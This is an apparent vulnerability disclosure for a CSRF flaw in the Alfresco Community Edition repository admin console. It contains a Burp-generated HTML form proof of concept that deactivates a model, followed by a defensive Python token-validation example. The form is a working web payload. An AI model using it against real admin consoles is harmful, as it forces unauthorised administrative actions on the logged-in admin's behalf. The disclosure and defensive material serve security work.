While security testing a vanilla install of Community Edition 2016-12 on Debian Jessie, I noted that in the repo admin console the alf-csrftoken URL parameter is set to "null", and the form requests have no alf-csrftoken set.
On testing I was able to issue a CSRF to deactivate a model; presumably any other admin console commands can be run via CSRF if an admin who is logged into the Repo console visits a malicious web page.
<!-- CSRF PoC - generated by Burp Suite Professional -->
<form action="http://192.168.56.103:8080/alfresco/s/admin/admin-repoconsole?t=%2Fadmin%2Fadmin-repoconsole&alf-csrftoken=null" method="POST" enctype="multipart/form-data">
<input type="hidden" name="repo-cmd" value="deactivate model model1" />
<input type="submit" value="Submit request" />
</form>
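
The server-side check whose absence the report describes, as an added example that is not part of the original post and is not Alfresco's code: a state-changing request is refused when its alf-csrftoken is missing, is a placeholder such as "null", or does not match the token bound to the admin's session. The function names, the host repo.example and the sample requests are assumptions constructed for illustration.

```python
import hmac
import secrets
from urllib.parse import urlsplit, parse_qs

TOKEN_PARAM = "alf-csrftoken"             # parameter name taken from the report
PLACEHOLDERS = {"", "null", "undefined"}  # values that mean no token was ever issued
SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}

def issue_token():
    """Hypothetical helper: unpredictable per-session token."""
    return secrets.token_urlsafe(32)

def check_request(method, url, headers, session_token, allowed_origins):
    """Return (allowed, reason) for one request against the session's token."""
    if method.upper() in SAFE_METHODS:
        return True, "safe method"
    # Defence in depth: when the browser sends Origin or Referer, it must be ours.
    source = headers.get("Origin") or headers.get("Referer")
    if source:
        parts = urlsplit(source)
        if f"{parts.scheme}://{parts.netloc}" not in allowed_origins:
            return False, "cross-origin request"
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    supplied = (query.get(TOKEN_PARAM) or [""])[0]
    # A literal "null" must never validate, even if the session also holds no token.
    if not session_token or supplied.lower() in PLACEHOLDERS:
        return False, "missing or placeholder token"
    # Constant-time comparison so the token cannot be guessed byte by byte.
    if not hmac.compare_digest(supplied.encode(), session_token.encode()):
        return False, "token mismatch"
    return True, "ok"

def demo():
    """Run constructed sample requests shaped like the one in the report."""
    origins = {"http://repo.example:8080"}
    token = issue_token()
    base = "http://repo.example:8080/alfresco/s/admin/admin-repoconsole"
    t = "?t=%2Fadmin%2Fadmin-repoconsole&alf-csrftoken="
    same = {"Origin": "http://repo.example:8080"}
    return {
        "forged_cross_site": check_request(
            "POST", base + t + "null", {"Origin": "http://other.example"}, token, origins),
        "null_token_no_origin": check_request("POST", base + t + "null", {}, token, origins),
        "null_token_null_session": check_request("POST", base + t + "null", same, None, origins),
        "wrong_token": check_request("POST", base + t + "abc", same, token, origins),
        "legitimate": check_request("POST", base + t + token, same, token, origins),
    }

if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```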